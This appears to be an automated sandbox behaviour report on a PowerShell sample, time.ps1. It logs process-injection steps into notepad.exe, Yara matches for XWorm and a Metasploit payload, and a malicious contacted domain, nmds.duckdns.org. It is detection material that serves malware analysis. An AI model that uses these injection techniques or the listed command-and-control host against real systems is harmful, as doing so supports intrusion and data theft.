Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01EC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01ED Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01EE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01EF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01F0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01F1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01F2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01F3 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\notepad.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected XWorm
Source: Yara match File source: 15.2.notepad.exe.29b03a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.notepad.exe.29b03c1ce78.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2180904890.0000029B03A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: notepad.exe PID: 6828, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected MetasploitPayload
Source: Yara match File source: amsi64_6120.amsi.csv, type: OTHER
Yara detected XWorm
Source: Yara match File source: 15.2.notepad.exe.29b03a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.notepad.exe.29b03c1ce78.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2180904890.0000029B03A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: notepad.exe PID: 6828, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1432680 Sample: time.ps1 Startdate: 27/04/2024 Architecture: WINDOWS Score: 100 13 Multi AV Scanner detection for domain / URL 2->13 15 Found malware configuration 2->15 17 Malicious sample detected (through community Yara rule) 2->17 19 8 other signatures 2->19 6 powershell.exe 30 2->6         started        process3 signatures4 21 Early bird code injection technique detected 6->21 23 Hijacks the control flow in another process 6->23 25 Writes to foreign memory regions 6->25 27 3 other signatures 6->27 9 notepad.exe 1 6->9         started        11 conhost.exe 6->11         started        process5
No contacted IP infos

Contacted URLs

Name Malicious Antivirus Detection Reputation
nmds.duckdns.org true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown